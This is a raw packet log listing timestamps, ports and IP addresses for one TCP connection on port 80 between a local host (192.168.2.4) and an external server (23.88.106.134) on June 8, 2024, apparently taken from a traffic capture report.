Jun 8, 2024 20:22:07.052282095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052282095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052304983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052316904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052668095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052684069 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052699089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052710056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052716017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052728891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052731991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052741051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052759886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052767038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052860022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052875996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052891016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052901030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052906036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052922010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052923918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052932978 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052938938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052952051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052952051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052954912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052970886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052972078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052987099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052988052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053004026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053004980 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053020000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053035021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053035975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053050995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053057909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053066969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053076982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053082943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053100109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053102016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053112030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053136110 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053145885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053358078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053374052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053390980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053400040 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053406954 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053421021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053423882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053431988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053441048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053441048 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053457022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053467035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053472996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053477049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053488016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053491116 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053514004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053523064 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053549051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053565979 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053580046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053591013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053596973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053606987 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053612947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053626060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053633928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053638935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053642988 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053653955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053668976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053684950 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053685904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053702116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053705931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053714991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053718090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053726912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053735018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053745031 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053750038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053757906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053766966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053778887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053782940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053793907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053800106 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053809881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053818941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053824902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053837061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053845882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053853035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053855896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053869963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053879023 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053886890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053889036 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053903103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053909063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053917885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053919077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.053941965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.053950071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054321051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054337978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054351091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054363012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054368019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054383993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054384947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054394007 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054409027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054413080 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054420948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054425001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054440022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054455042 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054456949 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054471970 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054481983 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054486990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054502010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054503918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054518938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054522991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054539919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054549932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054555893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054569006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054572105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054580927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054589987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054594994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054606915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054617882 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054627895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054637909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054899931 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054917097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054933071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054943085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054949999 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054961920 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054965973 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054979086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054982901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054989100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.054999113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.054999113 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055016041 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055018902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055032015 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055032969 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055052042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055058002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055072069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055073023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055098057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055099010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055114031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055116892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055128098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055131912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055147886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055149078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055165052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055179119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055181026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055197001 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055200100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055212021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055212975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055227995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055229902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055249929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055258989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055267096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055279970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055284977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055291891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055300951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055301905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055316925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055318117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055334091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055339098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055350065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055356979 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055366039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055368900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055383921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055392027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055399895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055401087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055417061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055428982 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055429935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055434942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055459976 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055473089 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055708885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055726051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055751085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055751085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055761099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055767059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055782080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055794001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055800915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055814981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055819988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055826902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055845022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055852890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055862904 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055877924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055905104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055911064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055924892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055927992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055948019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055952072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.055959940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.055989981 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056058884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056072950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056087971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056097984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056102991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056107044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056119919 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056126118 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056135893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056137085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056154013 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056174994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056205034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056221008 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056236982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056241989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056251049 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056255102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056272030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056274891 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056288004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056292057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056303024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056334972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056381941 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056396961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056411028 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056423903 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056427956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056444883 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056444883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056453943 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056463957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056474924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056484938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056487083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056498051 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056526899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056615114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056629896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056644917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056658030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056660891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056668997 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056677103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056678057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056694031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056701899 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056710958 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056711912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056734085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056745052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056772947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056787968 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056802034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056813955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056818962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056834936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056838989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056838989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056853056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056854010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056873083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056885004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056916952 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056935072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056948900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056957960 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056969881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056977034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.056987047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.056988001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057003975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057007074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057022095 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057027102 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057037115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057039022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057058096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057065010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057074070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057090998 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057113886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057130098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057156086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057171106 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057194948 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057212114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057235956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057240963 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057245970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057256937 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057281017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057286024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.057290077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.057327986 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144113064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144184113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144218922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144244909 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.144252062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144290924 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.144319057 CEST	49731	80	192.168.2.4	23.88.106.134
